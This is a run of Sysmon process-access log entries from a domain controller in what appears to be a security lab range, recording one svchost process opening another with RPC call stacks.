13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.107{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.092{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.092{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.092{08A6967A-4754-6000-1A05-000000009A01}28844184C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.076{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.076{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.076{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 